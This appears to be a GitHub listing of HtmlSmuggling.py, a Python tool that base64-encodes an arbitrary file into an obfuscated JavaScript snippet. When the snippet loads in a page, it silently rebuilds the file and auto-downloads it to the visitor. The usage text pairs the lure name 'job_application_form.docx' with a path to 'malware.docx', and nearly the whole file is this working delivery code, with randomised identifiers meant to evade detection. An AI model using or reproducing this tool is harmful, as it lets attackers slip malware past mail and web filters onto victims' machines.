-
Notifications
You must be signed in to change notification settings - Fork 22
/
Copy pathHtmlSmuggling.py
120 lines (120 loc) · 6.49 KB
/
HtmlSmuggling.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
############################################################################
#
# HtmlSmuggling.py (Html Smuggling) [ Main Program ]
# © 2022 ABDULKADİR GÜNGÖR All Rights Reserved
# Contact email address: [email protected]
#
# Developper: Abdulkadir GÜNGÖR ([email protected])
# Date: 06/2022
# All Rights Reserved (Tüm Hakları Saklıdır)
#
############################################################################
import random,string, sys, os, base64
#
def rndm_sequences():
rndm = []
for ii in range(0, 19):
while True:
unique = True
tmpstr1 = random.sample(string.ascii_lowercase, k=2)
tmpstr2 = random.sample(string.digits + string.ascii_lowercase, k=6)
tmpstr = tmpstr1[0] + tmpstr1[1] + tmpstr2[0] + tmpstr2[1] + tmpstr2[2] + tmpstr2[3] + tmpstr2[4] + tmpstr2[5]
for tmp in rndm:
if tmp == tmpstr:
unique = False
break
if unique:
rndm.append(tmpstr)
break
return rndm
#
def arg(outfile):
argv = sys.argv
number = len(argv)
if number == 3:
filename = argv[1].replace('"',"")
filepath = argv[2].replace('"',"")
else:
program = argv[0].split(sep='\\')[-1].split(sep='/')[-1]
print()
print("\t>> "+program+"\tfile_name\tfile_path" )
print("\t>> "+program+"\tjob_application_form.docx\tC:\\Users\\user0\\Desktop\\malware.docx")
print()
sys.exit(0)
# (0) check file and permissions
check_file_exist = os.access(filepath, os.F_OK)
try:
with open(file=outfile, encoding='utf-8', mode='w') as wfile:
wfile.write("Trial")
os.remove(outfile)
check_write_permission = True
except:
check_write_permission = False
if check_file_exist:
if check_write_permission:
return filename, filepath
else:
print()
print("\tDo not have permission to write or delete the file!")
print()
sys.exit(0)
else:
print()
print("\tThe file not found!")
print()
sys.exit(0)
#
if __name__ == '__main__':
outfile = "script.txt"
try:
file_name, filepath = arg(outfile)
except:
sys.exit(0)
try:
with open(file=filepath, mode='rb') as rbfile:
file_bytes = rbfile.read()
data_base64_bytes = base64.b64encode(file_bytes)
del file_bytes, filepath
file_base64 = data_base64_bytes.decode(encoding='UTF-8')
del data_base64_bytes
rndm = rndm_sequences()
template = """<script> var """ + rndm[0] + """=""" + rndm[0] + """;(function(""" + rndm[1] + """,""" + rndm[
2] + """){var """ + rndm[3] + """=""" + rndm[0] + """,""" + rndm[4] + """=""" + rndm[
1] + """();while(!![]){try{var """ + rndm[5] + """=-parseInt(""" + rndm[
3] + """(0x1b1))/0x1+-parseInt(""" + rndm[3] + """(0x1a7))/0x2+parseInt(""" + rndm[
3] + """(0x1b3))/0x3+-parseInt(""" + rndm[3] + """(0x1bd))/0x4*(parseInt(""" + rndm[
3] + """(0x1b6))/0x5)+parseInt(""" + rndm[3] + """(0x1b4))/0x6*(parseInt(""" + rndm[
3] + """(0x1a8))/0x7)+parseInt(""" + rndm[3] + """(0x1b9))/0x8+-parseInt(""" + rndm[
3] + """(0x1b7))/0x9;if(""" + rndm[5] + """===""" + rndm[2] + """)break;else """ + rndm[
4] + """['push'](""" + rndm[4] + """['shift']());}catch(""" + rndm[6] + """){""" + rndm[
4] + """['push'](""" + rndm[4] + """['shift']());}}}(""" + rndm[7] + """,0x291fa));function """ + \
rndm[7] + """(){var """ + rndm[
8] + """=['revokeObjectURL','508149iyQTpI','216tZOcWE','octet/stream','500685VYAZHK','2271357zoKGKP','length','2630616khEGdN','body','download','atob','4kKgjnM','createElement','214758lzjpsQ','44093NNfoUz','appendChild','buffer','URL','display:\\x20none','click','charCodeAt','href','""" + file_name + """','96643zAJuKG'];""" + \
rndm[7] + """=function(){return """ + rndm[8] + """;};return """ + rndm[7] + """();}var """ + rndm[
13] + """='""" + file_base64 + """',""" + rndm[14] + """=window[""" + rndm[0] + """(0x1bc)](""" + \
rndm[13] + """),""" + rndm[15] + """=new Uint8Array(""" + rndm[14] + """[""" + rndm[
0] + """(0x1b8)]);for(var i=0x0;i<""" + rndm[14] + """[""" + rndm[0] + """(0x1b8)];i++){""" + rndm[
15] + """[i]=""" + rndm[14] + """[""" + rndm[0] + """(0x1ae)](i);}function """ + rndm[0] + """(""" + \
rndm[10] + """,""" + rndm[12] + """){var """ + rndm[7] + """46=""" + rndm[7] + """();return """ + rndm[
0] + """=function(""" + rndm[0] + """ed,""" + rndm[9] + """){""" + rndm[0] + """ed=""" + rndm[
0] + """ed-0x1a7;var """ + rndm[11] + """=""" + rndm[7] + """46[""" + rndm[0] + """ed];return """ + \
rndm[11] + """;},""" + rndm[0] + """(""" + rndm[10] + """,""" + rndm[12] + """);}var """ + rndm[
16] + """=new Blob([""" + rndm[15] + """[""" + rndm[0] + """(0x1aa)]],{'type':""" + rndm[
0] + """(0x1b5)}),""" + rndm[17] + """=document[""" + rndm[0] + """(0x1be)]('a'),""" + rndm[
18] + """=window[""" + rndm[0] + """(0x1ab)]['createObjectURL'](""" + rndm[16] + """);document[""" + \
rndm[0] + """(0x1ba)][""" + rndm[0] + """(0x1a9)](""" + rndm[17] + """),""" + rndm[
17] + """['style']=""" + rndm[0] + """(0x1ac),""" + rndm[17] + """[""" + rndm[0] + """(0x1af)]=""" + \
rndm[18] + """,""" + rndm[17] + """[""" + rndm[0] + """(0x1bb)]=""" + rndm[0] + """(0x1b0),""" + rndm[
17] + """[""" + rndm[0] + """(0x1ad)](),window[""" + rndm[0] + """(0x1ab)][""" + rndm[
0] + """(0x1b2)](""" + rndm[18] + """); </script>"""
del file_name, file_base64, rndm
with open(file=outfile, encoding='utf-8', mode="w") as wfile:
wfile.write(template)
print()
print('\tScript File: "script.txt" ')
print('\tThe script file has been created successfully.')
print()
except:
print()
print('\tAn unexpected error has occurred!')
print()